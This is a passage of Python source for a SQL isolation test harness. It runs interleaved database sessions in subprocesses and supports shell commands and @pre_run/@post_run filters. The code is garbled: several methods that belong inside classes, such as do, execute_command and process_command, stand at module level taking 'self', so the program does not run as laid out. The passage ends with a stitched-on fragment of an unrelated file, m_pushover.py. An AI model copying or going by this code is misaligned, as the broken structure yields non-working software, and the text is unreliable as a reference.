                # Count preceding backslashes: an odd count means this quote
                # is escaped and does not close the command.
                cnt = 0
                for j in range(i-1, 0, -1):
                    if input_str[j] == '\\':
                        cnt = 1 + cnt
                    else:
                        break
                if cnt % 2 == 1:
                    continue
                # find shell end postion
                res_cmd = input_str[start: i]
                end = i
                continue
            if end != 0:
                # skip space until ':'
                if input_str[i] == ' ':
                    continue
                elif input_str[i] == ':':
                    is_trip_comma = True
                    res_sql = input_str[i+1:]
                    break
        if not is_start or end == 0 or not is_trip_comma:
            # BUG FIX: the message used Go-style "%v" and never interpolated
            # the argument; use Python %-formatting so the offending line is
            # actually reported.
            raise Exception("Invalid format: %s" % input_str)
        #unescape \' to ' and \\ to '
        res_cmd = res_cmd.replace('\\\'', '\'')
        res_cmd = res_cmd.replace('\\\\', '\\')
        return (True, res_cmd, res_sql)
class SQLIsolationExecutor(object):
    """Parses and runs a SQL isolation test file, multiplexing commands
    across multiple concurrent database sessions (one subprocess each)."""
    def __init__(self, dbname=''):
        # Maps session identifier -> SQLConnection subprocess wrapper.
        self.processes = {}
        # The re.S flag makes the "." in the regex match newlines.
        # When matched against a command in process_command(), all
        # lines in the command are matched and sent as SQL query.
        self.command_pattern = re.compile(r"^(-?\d+|[*])([&\\<\\>URSMq]*?)\:(.*)", re.S)
        # Fall back to the PGDATABASE environment variable when no database
        # name is supplied.
        if dbname:
            self.dbname = dbname
        else:
            self.dbname = os.environ.get('PGDATABASE')
    # To indicate the session has not been created or terminated.
    class SessionError(Exception):
        """Raised when a session-level failure message comes back from a
        child session process (see SQLConnection.query)."""
        def __init__(self, name, mode, msg):
            super(SQLIsolationExecutor.SessionError, self).__init__(msg)
            self.name = name
            self.mode = mode
    class SQLConnection(object):
        """Parent-process handle for one interactive test session.

        The actual database connection lives in a child process (an
        SQLSessionProcess); commands travel over a multiprocessing pipe as
        (command, is_fork) tuples and results come back as preformatted
        strings.
        """
        def __init__(self, out_file, name, mode, dbname, user = None, passwd = None):
            self.name = name
            self.mode = mode
            self.out_file = out_file
            self.dbname = dbname
            self.user = user
            self.passwd = passwd
            parent_conn, child_conn = multiprocessing.Pipe(True)
            self.p = multiprocessing.Process(target=self.session_process, args=(child_conn,))
            self.pipe = parent_conn
            # True while a forked (asynchronous) command awaits its join().
            self.has_open = False
            self.p.start()
            # Close "our" copy of the child's handle, so that if the child dies,
            # recv() on the pipe will fail.
            child_conn.close()
            self.out_file = out_file

        def session_process(self, pipe):
            # Child-process entry point: open the DB session and serve
            # commands from the pipe.
            sp = SQLIsolationExecutor.SQLSessionProcess(self.name,
                self.mode, pipe, self.dbname, user=self.user, passwd=self.passwd)
            sp.do()

        def query(self, command, post_run_cmd, global_sh_executor):
            """Run one SQL command synchronously and print its result.

            If post_run_cmd is given, the raw result is filtered through
            that shell command (via the global shell executor) first.
            """
            print(file=self.out_file)
            self.out_file.flush()
            if len(command.strip()) == 0:
                return
            if self.has_open:
                raise Exception("Cannot query command while waiting for results")
            self.pipe.send((command, False))
            r = self.pipe.recv()
            if r is None:
                raise Exception("Execution failed")
            # A reply of the form "#...:" marks a session-level failure.
            if re.match(r"^#.*:", r):
                raise SQLIsolationExecutor.SessionError(self.name, self.mode, r)
            if post_run_cmd != None:
                new_out = global_sh_executor.exec_global_shell_with_orig_str(r.rstrip(), post_run_cmd, True)
                for line in new_out:
                    print(line.rstrip(), file=self.out_file)
            else:
                print(r.rstrip(), file=self.out_file)

        def fork(self, command, blocking, global_sh_executor):
            """Start a command asynchronously.

            With blocking=True, verify the command really blocks by checking
            that no output arrives within 0.5s.
            """
            print(" <waiting ...>", file=self.out_file)
            self.pipe.send((command, True))
            if blocking:
                time.sleep(0.5)
                if self.pipe.poll(0):
                    p = self.pipe.recv()
                    raise Exception("Forked command is not blocking; got output: %s" % p.strip())
            self.has_open = True

        def join(self):
            # Wait for a previously forked command and print its output.
            r = None
            print(" <... completed>", file=self.out_file)
            if self.has_open:
                r = self.pipe.recv()
            if r is None:
                raise Exception("Execution failed")
            print(r.rstrip(), file=self.out_file)
            self.has_open = False

        def stop(self):
            # Ask the child to exit (empty command) and reap the process.
            self.pipe.send(("", False))
            self.p.join()
            if self.has_open:
                raise Exception("Should not finish test case while waiting for results")

        def quit(self):
            print(" ... <quitting>", file=self.out_file)
            self.stop()

        def terminate(self):
            # Hard kill, used on error paths.
            self.pipe.close()
            self.p.terminate()
    class SQLSessionProcess(object):
        def __init__(self, name, mode, pipe, dbname, user = None, passwd = None):
            """
            Child-process side of a test session: opens the database
            connection appropriate for `mode` and then serves commands
            received over `pipe`.
            """
            self.name = name
            self.mode = mode
            self.pipe = pipe
            self.dbname = dbname
            self.passwd = passwd
            self.user = user
            # If there is an exception thrown when creating session, save it and send
            # it to pipe when we get the first execute_command call.
            self.create_exception = None
            if self.mode == "utility":
                # Direct utility-mode connection to the primary for `name`.
                (hostname, port) = self.get_hostname_port(name, 'p')
                self.con = self.connectdb(given_dbname=self.dbname,
                                          given_host=hostname,
                                          given_port=port,
                                          given_opt="-c gp_role=utility",
                                          given_user=user,
                                          given_passwd=passwd)
            elif self.mode == "standby":
                # Connect to standby even when its role is recorded
                # as mirror. This is useful for scenarios where a
                # test needs to promote a standby without using
                # gpactivatestandby.
                (hostname, port) = self.get_hostname_port(name, 'm')
                self.con = self.connectdb(given_dbname=self.dbname,
                                          given_host=hostname,
                                          given_port=port,
                                          given_user=user,
                                          given_passwd=passwd)
            elif self.mode == "retrieve":
                # Retrieve-mode connection to the primary for `name`.
                (hostname, port) = ConnectionInfo.get_hostname_port(name, 'p')
                self.con = self.connectdb(given_dbname=self.dbname,
                                          given_host=hostname,
                                          given_port=port,
                                          given_opt="-c gp_retrieve_conn=true",
                                          given_user=user,
                                          given_passwd=passwd)
            elif self.mode == "mirror":
                # Connect to mirror even when it's role is recorded
                # as mirror. This is useful for scenarios where a
                # primary is marked down but could actually accept
                # connection. This implies utility connection.
                (hostname, port) = self.get_hostname_port(name, 'm')
                self.con = self.connectdb(given_dbname=self.dbname,
                                          given_host=hostname,
                                          given_port=port,
                                          given_opt="-c gp_role=utility")
            else:
                # Ordinary connection through the coordinator.
                self.con = self.connectdb(self.dbname)
        def connectdb(self, given_dbname, given_host = None, given_port = None, given_opt = None, given_user = None, given_passwd = None):
            """
            Connect via pg, retrying up to 1000 times (0.1s apart) while the
            server reports it is starting up or in recovery.  In retrieve
            mode, authentication failures are saved on self.create_exception
            instead of being raised, so they surface on first command.
            """
            con = None
            retry = 1000
            while retry:
                try:
                    if (given_port is None):
                        con = pg.connect(host= given_host,
                                         opt= given_opt,
                                         dbname= given_dbname,
                                         user = given_user,
                                         passwd = given_passwd)
                    else:
                        con = pg.connect(host= given_host,
                                         port= given_port,
                                         opt= given_opt,
                                         dbname= given_dbname,
                                         user = given_user,
                                         passwd = given_passwd)
                    break
                except Exception as e:
                    if self.mode == "retrieve" and ("auth token is invalid" in str(e) or "Authentication failure" in str(e) or "does not exist" in str(e)):
                        self.create_exception = e
                        break
                    elif (("the database system is starting up" in str(e) or
                           "the database system is in recovery mode" in str(e)) and
                          retry > 1):
                        retry -= 1
                        time.sleep(0.1)
                    else:
                        raise
            # Drop notices so test output stays deterministic.
            if con is not None:
                con.set_notice_receiver(null_notice_receiver)
            return con
        def get_hostname_port(self, contentid, role):
            """
            Gets the port number/hostname combination of the
            contentid and role.  Returns (None, port) when the segment lives
            on the local host, so pg.connect uses the default local socket.
            """
            query = ("SELECT hostname, port FROM gp_segment_configuration WHERE"
                     " content = %s AND role = '%s'") % (contentid, role)
            con = self.connectdb(self.dbname, given_opt="-c gp_role=utility")
            r = con.query(query).getresult()
            con.close()
            if len(r) == 0:
                raise Exception("Invalid content %s" % contentid)
            if r[0][0] == socket.gethostname():
                return (None, int(r[0][1]))
            return (r[0][0], int(r[0][1]))
def printout_result(self, r):
    """Render a pygresql result set (an executed Query object) psql-style.

    Imitates psql's default output closely enough for gpdiff.pl to treat
    it as a result set.  Not a perfect imitation: every field and header
    is left-justified, whereas psql centers headers and right-justifies
    numeric columns.
    """
    fields = r.listfields()
    rows = r.getresult()

    # Column widths: the widest of the header and any cell (NULL prints as "").
    widths = [len(str(f)) for f in fields]
    for row in rows:
        for idx, cell in enumerate(row):
            if cell is None:
                cell = ""
            widths[idx] = max(widths[idx], len(str(cell)))

    lines = []
    # Header row.
    lines.append("|".join(" " + f.ljust(w) + " " for f, w in zip(fields, widths)))
    # Separator bar ("----+----").
    lines.append("+".join("".ljust(w + 2, "-") for w in widths))
    # Data rows, normalizing floats, booleans and NULLs the way psql does.
    for row in rows:
        cells = []
        for idx, cell in enumerate(row):
            if isinstance(cell, float):
                cell = format(cell, "g")
            elif isinstance(cell, bool):
                cell = 't' if cell else 'f'
            elif cell is None:
                cell = ""
            cells.append(" " + str(cell).ljust(widths[idx]) + " ")
        lines.append("|".join(cells))
    # Row count footer.
    if len(rows) == 1:
        lines.append("(1 row)")
    else:
        lines.append("(%d rows)" % len(rows))
    return "\n".join(lines) + "\n"
def execute_command(self, command):
    """Run one SQL command on this session's connection and format the outcome.

    Returns the psql-style rendering for result sets, "<VERB> <count>" for
    DML with a row count, just the verb for DDL, or the error text when the
    query (or its formatting) raises.
    """
    def first_keyword(cmd):
        # Upper-cased first word of the command, with the trailing ';' dropped.
        return cmd[:-1].partition(" ")[0].upper()
    try:
        res = self.con.query(command)
        if res is None:
            # CREATE or other DDL without a result set or count.
            return first_keyword(command)
        if type(res) is str:
            # INSERT, UPDATE, etc that returns row count but not result set.
            return "%s %s" % (first_keyword(command), res)
        # SELECT or similar: a pg.Query result set, printed without the command.
        return self.printout_result(res)
    except Exception as e:
        return str(e)
def do(self):
    """
    Process loop.
    Ends when the command None is received

    Each pipe message is a (command, wait) pair; a falsy command terminates
    the loop.  When wait is set, sleep briefly before executing (used to
    observe blocking behavior).  Results (or the stored connection-creation
    error) are sent back over the same pipe, one reply per command.
    """
    (c, wait) = self.pipe.recv()
    while c:
        if wait:
            time.sleep(0.1)
        if self.create_exception:
            # When parent process received this, it should know the connection has not been
            # created. Thus, the process entry should be cleared.
            self.pipe.send("#%s%s> %s" % (self.name, self.mode, str(self.create_exception)))
        else:
            r = self.execute_command(c)
            self.pipe.send(r)
            # Drop the reference so large results are freed before the next recv.
            r = None
        (c, wait) = self.pipe.recv()
def get_process(self, out_file, name, mode="", dbname="", user=None, passwd=None):
    """Return the session process for (name, mode), creating it on first use.

    Session names must be numeric, and (outside utility mode) below 1024.
    """
    if name and not is_digit(name):
        raise Exception("Name should be a number")
    if name and mode != "utility" and int(name) >= 1024:
        raise Exception("Session name should be smaller than 1024 unless it is utility mode number")
    key = (name, mode)
    if key not in self.processes:
        self.processes[key] = SQLIsolationExecutor.SQLConnection(
            out_file, name, mode, dbname or self.dbname, user, passwd)
    return self.processes[key]
def quit_process(self, out_file, name, mode="", dbname=""):
    """Quit the session process registered under (name, mode).

    Raises when the name is invalid or the session was never started.
    """
    if name and not is_digit(name):
        raise Exception("Name should be a number")
    if name and mode != "utility" and int(name) >= 1024:
        raise Exception("Session name should be smaller than 1024 unless it is utility mode number")
    key = (name, mode)
    if key not in self.processes:
        raise Exception("Sessions not started cannot be quit")
    self.processes[key].quit()
    del self.processes[key]
def get_all_primary_contentids(self, dbname):
    """
    Retrieves all primary content IDs (including the master). Intended for
    use by *U queries.

    Falls back to the executor's default database when dbname is empty.
    Raises when gp_segment_configuration yields no primaries.
    """
    if not dbname:
        dbname = self.dbname
    con = pg.connect(dbname=dbname)
    try:
        # Fix: previously this connection was never closed (leak); siblings
        # such as get_hostname_port close theirs.
        result = con.query("SELECT content FROM gp_segment_configuration WHERE role = 'p' order by content").getresult()
    finally:
        con.close()
    if len(result) == 0:
        raise Exception("Invalid gp_segment_configuration contents")
    return [int(content[0]) for content in result]
def __preprocess_sql(self, name, pre_run_cmd, sql, global_sh_executor):
    """Optionally transform a SQL statement through a @pre_run shell command.

    When pre_run_cmd is set, exports GP_HOSTNAME/GP_PORT of the primary for
    `name` into the global shell, then pipes the statement through the
    command.  The shell must produce exactly one statement back.
    """
    if not pre_run_cmd:
        return sql
    (hostname, port) = ConnectionInfo.get_hostname_port(name, 'p')
    # Inject the current hostname and port to the shell.
    global_sh_executor.exec_global_shell("GP_HOSTNAME=%s" % hostname, True)
    global_sh_executor.exec_global_shell("GP_PORT=%s" % port, True)
    sqls = global_sh_executor.exec_global_shell_with_orig_str(sql, pre_run_cmd, True)
    if (len(sqls) != 1):
        # Fix: the old message used Go-style "%v" and passed `sqls` as an
        # extra Exception arg, so it was never interpolated into the text.
        raise Exception("Invalid shell command: %s" % sqls)
    return sqls[0]
def __get_retrieve_user_token(self, name, global_sh_executor):
    """Fetch the retrieve-mode (user, token) pair for the given content id.

    Exports GP_HOSTNAME/GP_PORT of the primary, then asks the global shell
    for the auth token and the $RETRIEVE_USER value.  Either element may be
    None when the shell produced no output.
    """
    # Fix: initialize both values so an empty shell output no longer raises
    # UnboundLocalError at the return statement.
    user = None
    token = None
    (hostname, port) = ConnectionInfo.get_hostname_port(name, 'p')
    global_sh_executor.exec_global_shell("GP_HOSTNAME=%s" % hostname, True)
    global_sh_executor.exec_global_shell("GP_PORT=%s" % port, True)
    out = global_sh_executor.exec_global_shell("get_retrieve_token", True)
    if (len(out) > 0):
        token = out[0]
    out = global_sh_executor.exec_global_shell("echo ${RETRIEVE_USER}", True)
    if (len(out) > 0):
        user = out[0]
    return (user, token)
def process_command(self, command, output_file, global_sh_executor):
    """
    Processes the given command.
    The command at this point still includes the isolation behavior
    flags, e.g. which session to use.

    Parses the optional session name, mode flag (U/S/R/M variants) and the
    optional @db_name / @pre_run / @post_run prefixes, then dispatches to
    the matching session process: plain query, fork (&, >), join (<), quit
    (q), or a host shell command ('!').
    """
    process_name = ""
    sql = command
    flag = ""
    con_mode = ""
    dbname = ""
    retrieve_token = None
    retrieve_user = None
    pre_run_cmd = None
    post_run_cmd = None
    m = self.command_pattern.match(command)
    if m:
        process_name = m.groups()[0]
        flag = m.groups()[1]
        # The first letter of the flag selects the connection mode.
        if flag and flag[0] == "U":
            con_mode = "utility"
        elif flag and flag[0] == "S":
            if len(flag) > 1:
                flag = flag[1:]
            con_mode = "standby"
        elif flag and flag[0] == "R":
            con_mode = "retrieve"
        elif flag and flag[0] == "M":
            con_mode = "mirror"
        sql = m.groups()[2]
        sql = sql.lstrip()
        # If db_name is specified , it should be of the following syntax:
        # 1:@db_name <db_name>: <sql>
        if sql.startswith('@db_name'):
            sql_parts = sql.split(':', 2)
            if not len(sql_parts) == 2:
                raise Exception("Invalid syntax with dbname, should be of the form 1:@db_name <db_name>: <sql>")
            if not sql_parts[0].startswith('@db_name'):
                raise Exception("Invalid syntax with dbname, should be of the form 1:@db_name <db_name>: <sql>")
            if not len(sql_parts[0].split()) == 2:
                raise Exception("Invalid syntax with dbname, should be of the form 1:@db_name <db_name>: <sql>")
            dbname = sql_parts[0].split()[1].strip()
            if not dbname:
                raise Exception("Invalid syntax with dbname, should be of the form 1:@db_name <db_name>: <sql>")
            sql = sql_parts[1]
        else:
            # @pre_run and @post_run are mutually exclusive prefixes.
            (found_hd, pre_run_cmd, ex_sql) = global_sh_executor.extract_sh_cmd('@pre_run', sql)
            if found_hd:
                sql = ex_sql
            else:
                (found_hd, post_run_cmd, ex_sql) = global_sh_executor.extract_sh_cmd('@post_run', sql)
                if found_hd:
                    sql = ex_sql
    if not flag:
        if sql.startswith('!'):
            sql = sql[1:]

            # Check for execution mode. E.g.
            #     !\retcode path/to/executable --option1 --option2 ...
            #
            # At the moment, we only recognize the \retcode mode, which
            # ignores all program output in the diff (it's still printed)
            # and adds the return code.
            mode = None
            if sql.startswith('\\'):
                mode, sql = sql.split(None, 1)
                if mode != '\\retcode':
                    raise Exception('Invalid execution mode: {}'.format(mode))

            cmd_output = subprocess.Popen(sql.strip(), stderr=subprocess.STDOUT, stdout=subprocess.PIPE, shell=True)
            stdout, _ = cmd_output.communicate()
            print(file=output_file)
            if mode == '\\retcode':
                print('-- start_ignore', file=output_file)
            print(stdout.decode(), file=output_file)
            if mode == '\\retcode':
                print('-- end_ignore', file=output_file)
                print('(exited with code {})'.format(cmd_output.returncode), file=output_file)
        else:
            sql_new = self.__preprocess_sql(process_name, pre_run_cmd, sql.strip(), global_sh_executor)
            self.get_process(output_file, process_name, con_mode, dbname=dbname).query(sql_new, post_run_cmd, global_sh_executor)
    elif flag == "&":
        # Fork and expect the statement to block.
        self.get_process(output_file, process_name, con_mode, dbname=dbname).fork(sql.strip(), True, global_sh_executor)
    elif flag == ">":
        # Fork without the blocking expectation.
        self.get_process(output_file, process_name, con_mode, dbname=dbname).fork(sql.strip(), False, global_sh_executor)
    elif flag == "<":
        if len(sql) > 0:
            raise Exception("No query should be given on join")
        self.get_process(output_file, process_name, con_mode, dbname=dbname).join()
    elif flag == "q":
        if len(sql) > 0:
            raise Exception("No query should be given on quit")
        self.quit_process(output_file, process_name, con_mode, dbname=dbname)
    elif flag == "U":
        # '*' targets the master and every primary segment.
        if process_name == '*':
            process_names = [str(content) for content in self.get_all_primary_contentids(dbname)]
        else:
            process_names = [process_name]
        for name in process_names:
            sql_new = self.__preprocess_sql(name, pre_run_cmd, sql.strip(), global_sh_executor)
            self.get_process(output_file, name, con_mode, dbname=dbname).query(sql_new, post_run_cmd, global_sh_executor)
    elif flag == "U&":
        sql_new = self.__preprocess_sql(process_name, pre_run_cmd, sql.strip(), global_sh_executor)
        self.get_process(output_file, process_name, con_mode, dbname=dbname).fork(sql_new, True, global_sh_executor)
    elif flag == "U<":
        if len(sql) > 0:
            raise Exception("No query should be given on join")
        self.get_process(output_file, process_name, con_mode, dbname=dbname).join()
    elif flag == "Uq":
        if len(sql) > 0:
            raise Exception("No query should be given on quit")
        self.quit_process(output_file, process_name, con_mode, dbname=dbname)
    elif flag == "S":
        sql_new = self.__preprocess_sql(process_name, pre_run_cmd, sql.strip(), global_sh_executor)
        self.get_process(output_file, process_name, con_mode, dbname=dbname).query(sql_new, post_run_cmd, global_sh_executor)
    elif flag == "R":
        if process_name == '*':
            process_names = [str(content) for content in self.get_all_primary_contentids(dbname)]
        else:
            process_names = [process_name]
        for name in process_names:
            try:
                sql_new = self.__preprocess_sql(name, pre_run_cmd, sql.strip(), global_sh_executor)
                (retrieve_user, retrieve_token) = self.__get_retrieve_user_token(name, global_sh_executor)
                self.get_process(output_file, name, con_mode, dbname=dbname, user=retrieve_user, passwd=retrieve_token).query(sql_new, post_run_cmd, global_sh_executor)
            except SQLIsolationExecutor.SessionError as e:
                # A failed retrieve session is torn down and removed so a
                # later command can start a fresh one under the same key.
                print (str(e), file=output_file)
                self.processes[(e.name, e.mode)].terminate()
                del self.processes[(e.name, e.mode)]
    elif flag == "R&":
        sql_new = self.__preprocess_sql(process_name, pre_run_cmd, sql.strip(), global_sh_executor)
        (retrieve_user, retrieve_token) = self.__get_retrieve_user_token(process_name, global_sh_executor)
        self.get_process(output_file, process_name, con_mode, dbname=dbname, user=retrieve_user, passwd=retrieve_token).fork(sql_new, True, global_sh_executor)
    elif flag == "R<":
        if len(sql) > 0:
            raise Exception("No query should be given on join")
        (retrieve_user, retrieve_token) = self.__get_retrieve_user_token(process_name, global_sh_executor)
        self.get_process(output_file, process_name, con_mode, dbname=dbname, user=retrieve_user, passwd=retrieve_token).join()
    elif flag == "Rq":
        if len(sql) > 0:
            raise Exception("No query should be given on quit")
        self.quit_process(output_file, process_name, con_mode, dbname=dbname)
    elif flag == "M":
        self.get_process(output_file, process_name, con_mode, dbname=dbname).query(sql.strip(), post_run_cmd, global_sh_executor)
    else:
        raise Exception("Invalid isolation flag")
def process_isolation_file(self, sql_file, output_file, initfile_prefix):
    """
    Processes the given sql file and writes the output
    to output file

    Lines are echoed to the output as they are read, accumulated until a
    statement terminator is seen, then handed to process_command().  All
    session processes are stopped on success and terminated on any error.
    """
    shell_executor = GlobalShellExecutor(output_file, initfile_prefix)
    try:
        command = ""
        newline = False
        for line in sql_file:
            # this logic replicates the python2 behavior of a trailing comma at the end of print
            # i.e. ''' print >>output_file, line.strip(), '''
            print((" " if command and not newline else "") + line.strip(), end="", file=output_file)
            newline = False
            if line[0] == "!":
                command_part = line # shell commands can use -- for multichar options like --include
            elif re.match(r";.*--", line) or re.match(r"^--", line):
                command_part = line.partition("--")[0] # remove comment from line
            else:
                command_part = line
            if command_part == "" or command_part == "\n":
                print(file=output_file)
                newline = True
            elif re.match(r".*;\s*$", command_part) or re.match(r"^\d+[q\\<]:\s*$", line) or re.match(r"^-?\d+[SUR][q\\<]:\s*$", line):
                # Statement is complete (ends with ';', or is a bare
                # quit/join command): execute it now.
                command += command_part
                try:
                    self.process_command(command, output_file, shell_executor)
                except GlobalShellExecutor.ExecutionError as e:
                    # error in the daemon shell cannot be recovered
                    raise
                except Exception as e:
                    # SQL-level failures are reported inline and do not
                    # abort the rest of the file.
                    print("FAILED: ", e, file=output_file)
                command = ""
            else:
                # Statement continues on the next line.
                command += command_part
        for process in list(self.processes.values()):
            process.stop()
    except:
        for process in list(self.processes.values()):
            process.terminate()
        shell_executor.terminate()
        raise
    finally:
        # terminate() is also reached on the success path; presumably it is
        # idempotent after stop() — confirm in SQLConnection.
        for process in list(self.processes.values()):
            process.terminate()
        shell_executor.terminate()
class SQLIsolationTestCase:
    """
    The isolation test case allows a fine grained control of interleaved
    executing transactions. This is mainly used to test isolation behavior.

    [<#>[flag]:] <sql> | ! <shell scripts or command>
    #: either an integer indicating a unique session, or a content-id if
       followed by U (for utility-mode connections) or R (for retrieve-mode
       connection). In 'U' mode or 'R' mode, the
       content-id can alternatively be an asterisk '*' to perform a
       utility-mode/retrieve-mode query on the master and all primary segments.
       If you want to create multiple connections to the same content-id, just
       increase N in: "content-id + {gpdb segment node number} * N",
       e.g. if gpdb cluster segment number is 3, then:
       (1) the master utility connections can be: -1U, -4U, -7U;
       (2) the seg0 connections can be: 0U, 3U, 6U;
       (3) the seg1 connections can be: 1U, 4U, 7U;
       (4) the seg2 connections can be: 2U, 5U, 8U;
    flag:
        &: expect blocking behavior
        >: running in background without blocking
        <: join an existing session
        q: quit the given session without blocking

        U: connect in utility mode to primary contentid from gp_segment_configuration
        U&: expect blocking behavior in utility mode (does not currently support an asterisk target)
        U<: join an existing utility mode session (does not currently support an asterisk target)
        R|R&|R<: similar to 'U' meaning except that the connection is in retrieve mode; don't
            worry about retrieve mode authentication here, just use the normal authentication directly.

    An example is:

    Execute BEGIN in transaction 1
    Execute BEGIN in transaction 2
    Execute INSERT in transaction 2
    Execute SELECT in transaction 1
    Execute COMMIT in transaction 2
    Execute SELECT in transaction 1

    The isolation tests are specified identical to sql-scripts in normal
    SQLTestCases. However, it is possible to prefix a SQL line with
    a transaction identifier followed by a colon (":").
    The above example would be defined by
    1: BEGIN;
    2: BEGIN;
    2: INSERT INTO a VALUES (1);
    1: SELECT * FROM a;
    2: COMMIT;
    1: SELECT * FROM a;

    Blocking behavior can be tested by forking and joining.
    1: BEGIN;
    2: BEGIN;
    1: DELETE FROM foo WHERE a = 4;
    2&: DELETE FROM foo WHERE a = 4;
    1: COMMIT;
    2<:
    2: COMMIT;

    2& forks the command. It is executed in the background. If the
    command is NOT blocking at this point, it is considered an error.
    2< joins the background command and outputs the result of the
    command execution.

    Session ids should be smaller than 1024.

    2U: Executes a utility command connected to port 40000.

    One difference to SQLTestCase is the output of INSERT.
    SQLTestCase would output "INSERT 0 1" if one tuple is inserted.
    SQLIsolationTestCase would output "INSERT 1". As the
    SQLIsolationTestCase needs to have a more fine-grained control
    over the execution order than possible with PSQL, it uses
    the pygresql python library instead.

    Connecting to a specific database:
    1. If you specify a db_name metadata in the sql file, connect to that database in all open sessions.
    2. If you want a specific session to be connected to a specific database , specify the sql as follows:
       1:@db_name testdb: <sql>
       2:@db_name test2db: <sql>
       1: <sql>
       2: <sql>
       etc

       Here session 1 will be connected to testdb and session 2 will be connected to test2db. You can specify @db_name only at the beginning of the session. For eg:, following would error out:
       1:@db_name testdb: <sql>
       2:@db_name test2db: <sql>
       1: @db_name testdb: <sql>
       2: <sql>
       etc

    Quitting sessions:
       By default, all opened sessions will be stopped only at the end of the sql file execution. If you want to explicitly quit a session
       in the middle of the test execution, you can specify a flag 'q' with the session identifier. For eg:
       1:@db_name testdb: <sql>
       2:@db_name test2db: <sql>
       1: <sql>
       2: <sql>
       1q:
       2: <sql>
       3: <sql>
       2q:
       3: <sql>
       2: @db_name test: <sql>

       1q: ---> Will quit the session established with testdb.
       2q: ---> Will quit the session established with test2db.

       The subsequent 2: @db_name test: <sql> will open a new session with the database test and execute the sql against that session.
       Note: Do not expect blocking behavior from explicit quit statements.
       This implies that a subsequent statement can execute while the relevant
       session is still undergoing exit.

    Shell Execution for SQL or Output:
       @pre_run can be used for executing shell command to change input (i.e. each SQL statement) or get input info;
       @post_run can be used for executing shell command to change output (i.e. the result set printed for each SQL execution)
       or get output info. Just use the env variable ${RAW_STR} to refer to the input/out stream before shell execution,
       and the output of the shell command will be used as the SQL executed or output printed into results file.

       1: @post_run ' TOKEN1=` echo "${RAW_STR}" | awk \'NR==3\' | awk \'{print $1}\'` && export MATCHSUBS="${MATCHSUBS}${NL}m/${TOKEN1}/${NL}s/${TOKEN1}/token_id1/${NL}" && echo "${RAW_STR}" ': SELECT token,hostname,status FROM GP_ENDPOINTS WHERE cursorname='c1';
       2R: @pre_run ' echo "${RAW_STR}" | sed "s#@TOKEN1#${TOKEN1}#" ': RETRIEVE ALL FROM "@TOKEN1";

       These 2 samples are to:
       - Sample 1: set env variable ${TOKEN1} to the cell (row 3, col 1) of the result set, and print the raw result.
         The env var ${MATCHSUBS} is used to store the matchsubs section so that we can store it into initfile when
         this test case file is finished executing.
       - Sample 2: replacing "@TOKEN1" by the generated token which is fetched in sample 1

       There are some helper functions which will be sourced automatically to make above
       cases easier. See global_sh_executor.sh for more information.

       $RETRIEVE_USER is a special environment variable which will be read by python to use
       as the username for the retrieve mode session. `None` will be used if the value has not
       been set when starting a retrieve mode session. See the get_retrieve_token in global_sh_executor.sh
       for more information about how to get the retrieve session password.

    Catalog Modification:

    Some tests are easier to write if it's possible to modify a system
    catalog across the *entire* cluster. To perform a utility-mode query on
    all segments and the master, you can use *U commands:

    *U: SET allow_system_table_mods = true;
    *U: UPDATE pg_catalog.<table> SET <column> = <value> WHERE <cond>;

    Since the number of query results returned by a *U command depends on
    the developer's cluster configuration, it can be useful to wrap them in
    a start_/end_ignore block. (Unfortunately, this also hides legitimate
    failures; a better long-term solution is needed.)

    Block/join flags are not currently supported with *U.

    Line continuation:
    If a line is not ended by a semicolon ';' which is followed by 0 or more spaces, the line will be combined with next line and
    sent together as a single statement.
    e.g.: Send to the server separately:
        1: SELECT * FROM t1;     -> send "SELECT * FROM t1;"
           SELECT * FROM t2;     -> send "SELECT * FROM t2;"
    e.g.: Send to the server once:
        1: SELECT * FROM
           t1; SELECT * FROM t2; -> "send SELECT * FROM t1; SELECT * FROM t2;"

    ATTENTION:
    Send multi SQL statements once:
    Multi SQL statements can be sent at once, but there are some known issues. Generally only the last query result will be printed.
    But due to the difficulties of dealing with semicolons inside quotes, we always echo the first SQL command instead of the last
    one if query() returns None. This created some strange issues like:
        CREATE TABLE t1 (a INT); INSERT INTO t1 SELECT generate_series(1,1000);
        CREATE 1000 (Should be INSERT 1000, but here the CREATE is taken due to the limitation)
    """

    def run_sql_file(self, sql_file, out_file = None, out_dir = None, optimizer = None):
        """
        Given a sql file and an ans file, this adds the specified gucs (self.gucs) to the sql file , runs the sql
        against the test case database (self.db_name) and verifies the output with the ans file.
        If an 'init_file' exists in the same location as the sql_file, this will be used
        while doing gpdiff.
        """
        # Add gucs to the test sql and form the actual sql file to be run
        if not out_dir:
            out_dir = self.get_out_dir()

        if not os.path.exists(out_dir):
            TINCSystem.make_dirs(out_dir, ignore_exists_error = True)

        if optimizer is None:
            gucs_sql_file = os.path.join(out_dir, os.path.basename(sql_file))
        else:
            # sql file will be <basename>_opt.sql or <basename>_planner.sql based on optimizer
            gucs_sql_file = os.path.join(out_dir, os.path.basename(sql_file).replace('.sql', '_%s.sql' %self._optimizer_suffix(optimizer)))
        self._add_gucs_to_sql_file(sql_file, gucs_sql_file, optimizer)
        self.test_artifacts.append(gucs_sql_file)

        if not out_file:
            if optimizer is None:
                out_file = os.path.join(self.get_out_dir(), os.path.basename(sql_file).replace('.sql', '.out'))
            else:
                # out file will be *_opt.out or *_planner.out based on optimizer
                out_file = os.path.join(self.get_out_dir(), os.path.basename(sql_file).replace('.sql', '_%s.out' %self._optimizer_suffix(optimizer)))

        self.test_artifacts.append(out_file)
        executor = SQLIsolationExecutor(dbname=self.db_name)
        with open(out_file, "w") as f:
            executor.process_isolation_file(open(sql_file), f, out_file)
            f.flush()

        if out_file[-2:] == '.t':
            out_file = out_file[:-2]

        return out_file
if __name__ == "__main__":
    # Entry point: read an isolation spec from stdin and write the annotated
    # results to stdout.
    parser = OptionParser()
    parser.add_option("--dbname", dest="dbname",
                      help="connect to database DBNAME", metavar="DBNAME")
    parser.add_option("--initfile_prefix", dest="initfile_prefix",
                      help="The file path prefix for automatically generated initfile", metavar="INITFILE_PREFIX")
    (options, args) = parser.parse_args()

    # Explicitly set multiprocessing start method to 'fork' (Unix
    # default) to make isolation2 work with python3.8+ on MacOS.
    if sys.version_info >= (3, 8) and sys.platform == "darwin":
        multiprocessing.set_start_method('fork')

    executor = SQLIsolationExecutor(dbname=options.dbname)
    executor.process_isolation_file(sys.stdin, sys.stdout, options.initfile_prefix)
|
m_pushover.py | # coding=utf-8
'''
pi@raspberrypi ~ $ echo $LANG
zh_TW.UTF-8
'''
import m_settings
import logging, threading
import datetime, time
import httplib, urllib, json
import collections, array
